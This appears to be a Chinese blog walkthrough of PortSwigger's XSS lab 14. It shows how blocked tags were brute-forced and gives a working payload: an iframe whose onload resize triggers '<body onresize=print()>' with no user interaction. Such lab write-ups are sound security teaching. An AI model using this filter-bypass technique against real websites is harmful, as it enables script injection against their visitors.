渗透实战PortSwigger靶场-XSS Lab 14:大多数标签和属性被阻止

<script>标签被拦截

我们需要把全部可用的 tag 和 event 进行暴力破解

XSS cheat sheet:

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

通过爆破发现body可以用

再把全部 events 放进去爆破

这些 event 全部可用

<body onresize="alert('XSS')">调整窗口大小触发

lab 要求我们使用 print()函数,并且在不需要用户交互的情况下自动触发 print().

这里可以用iframe标签在页面插入一个区域加载漏洞页面,并且通过 onload属性加载一个窗口值从而触发 print()

<iframe src="https://0a3e00370363938e800efd60009e0017.web-security-academy.net/?search=%3Cbody+onresize%3Dprint%28%29%3E" onload=this.style.width='100px'>

<iframe> 加载完成后,onload 事件触发,修改其宽度为 100px。
由于 <iframe> 尺寸变化,其内部文档的 body 也会触发 resize 事件。
最终执行 print(),弹出打印对话框。

后续敬请关注

echo "QuermeinhumikTogaHR0cHM6Ly93d3cuYmlsaWJpbGkuY29tL3ZpZGVvL0JWMU1xVDR6dEU0Uy8/
dmRfc291cmNlPTMwZTg4MWZjNjFiMmRhYWMwNWZhYWQ3ZGZmMDIyMzFmCg=="|base64 -d
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

PenTest3r_Zerlk

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值